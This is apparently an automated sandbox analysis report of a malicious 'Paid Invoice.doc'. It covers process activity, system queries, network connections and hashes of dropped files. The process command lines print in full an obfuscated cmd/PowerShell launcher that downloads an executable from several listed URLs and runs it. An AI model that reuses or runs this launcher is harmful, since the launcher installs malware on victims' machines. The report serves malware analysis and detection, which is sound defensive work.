Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Starts Microsoft Word (often done to prevent that the user detects that something wrong)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 203.195.212.211 443

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
21:34:48	API Interceptor	1695x Sleep call for process: iexplore.exe modified from: 60000ms to: 100ms
21:35:18	API Interceptor	1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

Source	Detection	Cloud	Link
royal-tec.com	0%	virustotal	Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot

Startup

System is w7

iexplore.exe (PID: 3388 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)

iexplore.exe (PID: 3444 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)

ssvagent.exe (PID: 3504 cmdline: 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new MD5: 0953A0264879FD1E655B75B63B9083B7)

WINWORD.EXE (PID: 3984 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)

cmd.exe (PID: 4036 cmdline: cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/Eny.Sl5M+l5Mplit(Eny?mgY+mgYEmgY+mg'+'Yny);tL8SDl5M+l5MC = ngS+ngStmgY+mgYL8emgY+mgYl5M+l5Mnv:l5M+l5Mpublic + EnyFVkEnymgY+mgY + mgY+mgYtL8NmgY+mgYSB + mgY+mgY(mgY+mgYE'+'nngl5M+l5MS+ngS'+'y.l5M+l5MexEny+'+'EnyeEny);foreamgY+mgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mgYels2(t'+'L8a'+'sfl5M+l5Mc.lmgY+mgYsmgY+m'+'gY2ToStr0qIi0ql5M+l5MINgls2mgl5M+l5MY+mgngS+'+'ngSY()mgY+mgY, mgY+mgYtL8SDCl5M+l5MmgY+mgY);&(EnyInmgY+mgl5M+l5MYvoEmgY+mgl5M+l5MYny+EnykEmgY+mgYnl5M'+'+l5My+EnmgY+m'+'gYyngS+ngSe-IngS+ngStemmgY+mgYEl5M+l5Mny)(l5M+l5MtmgY+mgYL8mgY+mgY'+'l5M+l5MSDCmgYngS+nl5M+l5'+'MgS+mgY);bremgY+mg'+'Yam'+'gY+ng'+'S+ngSmgYkmgY+'+'mgY;}mgY+mgYcatcmgY+mgYh{}}mgY) -CRePLace ([ChAR]7'+'0+[ChAR]86ngS+ngS+[ChAR]1l5'+'M+l5M07),[ChAR]92-rePLAce([ChAR]116+[ChAR]76+[ChAR]56ngS+nl5M+l5MgS),[ChAngS+ngSR]3l5M+l5M6 -rePLAce'+' mgYls2mgY,[ChAR'+']34 -rePLAce ([ChAR]6l5M+l5MngS+ngS9+[l5M+l5MChAR]110+[ChAR]121'+'),[ChA'+'R]39 -rePLAc'+'e ([ChAR]48+[ChAR]113'+'+[ChAR]7ngS+ngS3),[C'+'hAR]96)f2i& ( nhl5M+l5MHENv:publiC[13]+nhHen'+'V:puBliC[5]+mgYxmgY)ngS).rel5M+l5MplacE(n'+'gSmgYngS,[STRIl5M+l5MNg][ChaR]39).replacE(([ChaR]1'+'10+[l5M+l5MChaR]104+[ChaR]72)'+',ngSCxsnl5M+l5MgS).replacE('+'ngSf2ingS,'+'ngSpwDl5M+l5Mn'+'gS) pwD&((VARIABl5M+l5Mle ngS*mdr*ngS).l5M+l5MNamE[3,11,2'+']-JOiNngSngS)l5M)-rePlACE ([cHar]67+[cHar]120+[cHar]115),[cHar]36 -rePlACE ([cHar]110+[cHar]103+[cHar]83),[cH'+'ar]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE 'l5M',[Char]39 -RePlaCe 'sdP',[Char]124) ) MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 2088 cmdline: powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/Eny.Sl5M+l5Mplit(Eny?mgY+mgYEmgY+mg'+'Yny);tL8SDl5M+l5MC = ngS+ngStmgY+mgYL8emgY+mgYl5M+l5Mnv:l5M+l5Mpublic + EnyFVkEnymgY+mgY + mgY+mgYtL8NmgY+mgYSB + mgY+mgY(mgY+mgYE'+'nngl5M+l5MS+ngS'+'y.l5M+l5MexEny+'+'EnyeEny);foreamgY+mgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mgYels2(t'+'L8a'+'sfl5M+l5Mc.lmgY+mgYsmgY+m'+'gY2ToStr0qIi0ql5M+l5MINgls2mgl5M+l5MY+mgngS+'+'ngSY()mgY+mgY, mgY+mgYtL8SDCl5M+l5MmgY+mgY);&(EnyInmgY+mgl5M+l5MYvoEmgY+mgl5M+l5MYny+EnykEmgY+mgYnl5M'+'+l5My+EnmgY+m'+'gYyngS+ngSe-IngS+ngStemmgY+mgYEl5M+l5Mny)(l5M+l5MtmgY+mgYL8mgY+mgY'+'l5M+l5MSDCmgYngS+nl5M+l5'+'MgS+mgY);bremgY+mg'+'Yam'+'gY+ng'+'S+ngSmgYkmgY+'+'mgY;}mgY+mgYcatcmgY+mgYh{}}mgY) -CRePLace ([ChAR]7'+'0+[ChAR]86ngS+ngS+[ChAR]1l5'+'M+l5M07),[ChAR]92-rePLAce([ChAR]116+[ChAR]76+[ChAR]56ngS+nl5M+l5MgS),[ChAngS+ngSR]3l5M+l5M6 -rePLAce'+' mgYls2mgY,[ChAR'+']34 -rePLAce ([ChAR]6l5M+l5MngS+ngS9+[l5M+l5MChAR]110+[ChAR]121'+'),[ChA'+'R]39 -rePLAc'+'e ([ChAR]48+[ChAR]113'+'+[ChAR]7ngS+ngS3),[C'+'hAR]96)f2i& ( nhl5M+l5MHENv:publiC[13]+nhHen'+'V:puBliC[5]+mgYxmgY)ngS).rel5M+l5MplacE(n'+'gSmgYngS,[STRIl5M+l5MNg][ChaR]39).replacE(([ChaR]1'+'10+[l5M+l5MChaR]104+[ChaR]72)'+',ngSCxsnl5M+l5MgS).replacE('+'ngSf2ingS,'+'ngSpwDl5M+l5Mn'+'gS) pwD&((VARIABl5M+l5Mle ngS*mdr*ngS).l5M+l5MNamE[3,11,2'+']-JOiNngSngS)l5M)-rePlACE ([cHar]67+[cHar]120+[cHar]115),[cHar]36 -rePlACE ([cHar]110+[cHar]103+[cHar]83),[cH'+'ar]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE 'l5M',[Char]39 -RePlaCe 'sdP',[Char]124) ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\JavaDeployReg.log
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	89
Entropy (8bit):	4.476267104949064
Encrypted:	false
MD5:	991FB7D29DD4453E64750444769D4915
SHA1:	AFFE354FA35B4039615E061DF857BA724EFA3837
SHA-256:	8767EF090BA765B7601871D239ED6EA0E70EFFA8EA80DEDE5A5D50217D5B14E8
SHA-512:	EC2121B987F2022484A15131062AF6065FC6831239F1BBB4267B852DEF7026BC10C48CC5757F9D4281127390ED61A9DC3D362EAAF8B512E7727537D0875AE280
Malicious:	false
Reputation:	low

C:\Users\HERBBL~1\AppData\Local\Temp\~DF0BCDD3B7C1602C28.TMP
File Type:	FoxPro FPT, blocks size 258, next free block index 16711424
Size (bytes):	29745
Entropy (8bit):	0.5409356522034485
Encrypted:	false
MD5:	EFE28701A53759F5F005E728B11D635B
SHA1:	7DD9E97692D1ADF1C62A030254CE4B4D2DB6EEC1
SHA-256:	754FE6F7578B47BCBBA95A50067489E431CF46024A8ABF18B7DAD5D5F48D8B60
SHA-512:	EABA734B28C32F5B9DDC270F286710483D6D4E56340FD6889051F4FBBC986A1C0A1F79C50837C0D308B3516439011EE79AB304985F3CB31393A9846CF70FA506
Malicious:	false
Reputation:	low

C:\Users\HERBBL~1\AppData\Local\Temp\~DF2B45E99636F7990D.TMP
File Type:	data
Size (bytes):	13109
Entropy (8bit):	3.413691124199199
Encrypted:	false
MD5:	ACD6071A6E0765ECFA36501C25BFB6F4
SHA1:	0C3F2020AAFFFB9605F23BD6AB9EE55973D7E1EF
SHA-256:	F010D9EC452BFD56AD6A91B99A702FAAACDF64AFC680189E25651E378B854C68
SHA-512:	AFE7A345923662B2C2274872DD08519FB8AEE26E039FE30C6EDCDA817DCB149FACD56AA6219762DC633ADA520B8F4371D2E05B6D57F2972156D335D96A32729B
Malicious:	false
Reputation:	low

C:\Users\HERBBL~1\AppData\Local\Temp\~DF66D4E0FE8F4A031D.TMP
File Type:	FoxPro FPT, blocks size 258, next free block index 16711424
Size (bytes):	29989
Entropy (8bit):	2.7522282731793473
Encrypted:	false
MD5:	E28DC174C31A8E6C1CF90B2CCFB5D58E
SHA1:	FC991887359DA82D6AD0E7A4FA6CCD7A01F843E1
SHA-256:	F57640491565EFDBD3AD4F94E55686DD913C6F2D358208670300F45024EA59D7
SHA-512:	974F580B250171682BFC272BDD20205A607659EC260EBA07EAE8806E1A97F649CF74DD5C20B28A56E051BF7383EB7D95D7525A5472794C76EE290560F289E57F
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
File Type:	data
Size (bytes):	471
Entropy (8bit):	7.157462301898582
Encrypted:	false
MD5:	B93B055F18ED02AC65402253BFA21777
SHA1:	77E49C843005A144BE3DE9485B1F9BC4E5A9126D
SHA-256:	A2649B55B45DF55AC2A8374490B428AD312A749BDA88AA21B6C800DCE6AD4CED
SHA-512:	1A7E8C92A1516E9B2E224E239C29EA395C615585A429B5FDF66B794DBBE6336C2BCE435ACD4F145563E5ACB4EDDBE001566E1BB345BF9F6F5EAE0341B9AAB2A6
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
File Type:	data
Size (bytes):	340
Entropy (8bit):	3.41535660755574
Encrypted:	false
MD5:	3A1A435517BFF406101CA58D35326A26
SHA1:	30124A12AE1C1343F44464DD54986248A110CF88
SHA-256:	11E9894DB919464FA152B0452CAB92658C2FBEF8B0383314437FA4B17F348B6B
SHA-512:	0333EE141BBB29A77FC072BBCA5BE917B55E95463C280BD62C7F1D73DDCF2DCA11A75B1B8FBD171A3C0DFA5831A42B2C3B67B1F84DAB0D7397AD0C55E93D09A9
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
File Type:	data
Size (bytes):	868
Entropy (8bit):	3.89016238958029
Encrypted:	false
MD5:	AB6F00391CDDD1BF95429DA84BF05DAC
SHA1:	6DFBF68BCA604A17BFB0109068569B598B432B8E
SHA-256:	50C2DDE39A377576E12C3EEF06C394D2848A802F8B645302895520D75B25F881
SHA-512:	160B09A4D70A7BC4333AC070B5070F3B7DACF5EE3F3EAE14E64BC993EFFCB2BD046F9D6D5DBDD76D0EE0416EFB285585CB64348996A9C0B25326D2583394E418
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\en-US.1
File Type:	data
Size (bytes):	18176
Entropy (8bit):	5.525633053475079
Encrypted:	false
MD5:	5A34CB996293FDE2CB7A4AC89587393A
SHA1:	3C96C993500690D1A77873CD62BC639B3A10653F
SHA-256:	C6A5377CBC07EECE33790CFC70572E12C7A48AD8296BE25C0CC805A1F384DBAD
SHA-512:	E1B7D0107733F81937415104E70F68B1BE6FD0CA65DCCF4FF72637943D44278D3A77F704AEDFF59D2DBC0D56A609B2590C8EC0DD6BC48AB30F1DAD0C07A0A3EE
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	385969
Entropy (8bit):	5.1316299112770425
Encrypted:	false
MD5:	89D7FDB3DE0C78F96B40030205EFB616
SHA1:	EAEF1812481E918FD73AFDDF27DB2D5446CD1884
SHA-256:	0E0F38D35FC640DBDE485A53B6EC2EE1ADB25C5602DCF9EC77EA272E9B3F611B
SHA-512:	63971D6FB7958B69E20BC08091CF9123232D5AEE285027D826572563B4BD3292E5A94C232A4FD0CE62F88172327838110B86A933E717E9BD7AEBDE01307DE876
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2A9FB021-1034-11E8-B7AC-B2C276BF9C88}.dat
File Type:	Microsoft Word Document
Size (bytes):	46680
Entropy (8bit):	1.917465026955143
Encrypted:	false
MD5:	1025B6587DE90226F302BB8ABB1B9D25
SHA1:	5AD966A4F75353F89175C1E671E7C0DFA1541D01
SHA-256:	F88812F42AC03E64A009E5D2CEAEB8F51F8722BC44D989DB1EBA85D2EAA41D69
SHA-512:	A5E770AA32EC4B573ECD9AFDCB598C15161E7984F87A00789E49D218D370CC237150992A83590CCEE6A1D98277B4F70A8A7D82EAFD5B4289551D241EDDD2C58F
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{2A9FB023-1034-11E8-B7AC-B2C276BF9C88}.dat
File Type:	Microsoft Word Document
Size (bytes):	19032
Entropy (8bit):	1.6015001335266745
Encrypted:	false
MD5:	7A46C802A09A26187C18329794631CA3
SHA1:	256DBDE1CEC87ACDDC8B720A864A7D6E936FF179
SHA-256:	36D90CB7639C8F642CF5B65F55DE4D52CABE6B6740C351EB6CFE4075EF93F982
SHA-512:	B868D8B8CC5976DAD915D8FA35E842B14E932BF015FAAE20DB870B753F635DCC02D0E81897629676E7229BA400891B82321B9B63208E448167752DAB6E863E8C
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{349484E0-1034-11E8-B7AC-B2C276BF9C88}.dat
File Type:	Microsoft Word Document
Size (bytes):	19032
Entropy (8bit):	1.5869530262442693
Encrypted:	false
MD5:	83D7D15BE11939013C801EF055125FF3
SHA1:	78DFA8868257D6A6693D41341BCF370E9FDFB9EF
SHA-256:	068D26552A78220E0A72010DE488B1D7F318048CBC75F740E6143B1BC0E62F27
SHA-512:	2233F28B93D6312BE34D357AF9FC3FD5559DE6538873106188D80A9A8A27155FD8DE6C9319000729D5D11162C8F0C9D6DCCEE0C105F121C3850FD522A4B0D7C0
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver35C7.tmp
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	15789
Entropy (8bit):	5.05805553363972
Encrypted:	false
MD5:	A37D5835A4A14C9BFAD7898C3B719F3C
SHA1:	F21CF355B4515C09174F5D5E5BADBF3319DD70F0
SHA-256:	F0B53707B2932957387CA2C39C782DD32BCB60DF970313A029D605B719AC1BF9
SHA-512:	079F412666F02FE93F2AA4DEC7CBC22B91BE70B71037C3040091B66EA5A680590C8E92DDEE64D2DD934858B44A4C97A8CE53660F4820698FD31047E4ED08A25C
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver40A7.tmp
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	15789
Entropy (8bit):	5.05805553363972
Encrypted:	false
MD5:	A37D5835A4A14C9BFAD7898C3B719F3C
SHA1:	F21CF355B4515C09174F5D5E5BADBF3319DD70F0
SHA-256:	F0B53707B2932957387CA2C39C782DD32BCB60DF970313A029D605B719AC1BF9
SHA-512:	079F412666F02FE93F2AA4DEC7CBC22B91BE70B71037C3040091B66EA5A680590C8E92DDEE64D2DD934858B44A4C97A8CE53660F4820698FD31047E4ED08A25C
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc.usc4tz8.partial
File Type:	0
Size (bytes):	127488
Entropy (8bit):	6.454188296176733
Encrypted:	false
MD5:	D42F578DFC373A0752BB65C4051099DC
SHA1:	15974C3B99D94D26636C4E642CE25CB60F9CA4C0
SHA-256:	55DB6C404B252F370869F187B8CECEDE16488678936D44A0D785AB1012A19F0F
SHA-512:	8C6F7D471C3AE3B7BFB0E2FE237F5867184BC274943DB02CACC6BB9D97DDF782E3FA41BD4D9372C7E33D4E8BEAE265DDD33ED5F9DD46C69C9DB40C6FA039F2CB
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc.usc4tz8.partial:Zone.Identifier
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.9500637564362093
Encrypted:	false
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc:Zone.Identifier
File Type:	very short file (no magic)
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
MD5:	ECCBC87E4B5CE2FE28308FD9F2A7BAF3
SHA1:	77DE68DAECD823BABBB58EDB1C8E14D7106E83BB
SHA-256:	4E07408562BEDB8B60CE05C1DECFE3AD16B72230967DE01F640B7E4729B49FCE
SHA-512:	3BAFBF08882A2D10133093A1B8433F50563B93C14ACD05B79028EB1D12799027241450980651994501423A66C276AE26C43B739BC65C4E16B10C3AF6C202AEBB
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice[1].doc
File Type:	0
Size (bytes):	127488
Entropy (8bit):	6.454188296176733
Encrypted:	false
MD5:	D42F578DFC373A0752BB65C4051099DC
SHA1:	15974C3B99D94D26636C4E642CE25CB60F9CA4C0
SHA-256:	55DB6C404B252F370869F187B8CECEDE16488678936D44A0D785AB1012A19F0F
SHA-512:	8C6F7D471C3AE3B7BFB0E2FE237F5867184BC274943DB02CACC6BB9D97DDF782E3FA41BD4D9372C7E33D4E8BEAE265DDD33ED5F9DD46C69C9DB40C6FA039F2CB
Malicious:	false
Reputation:	low

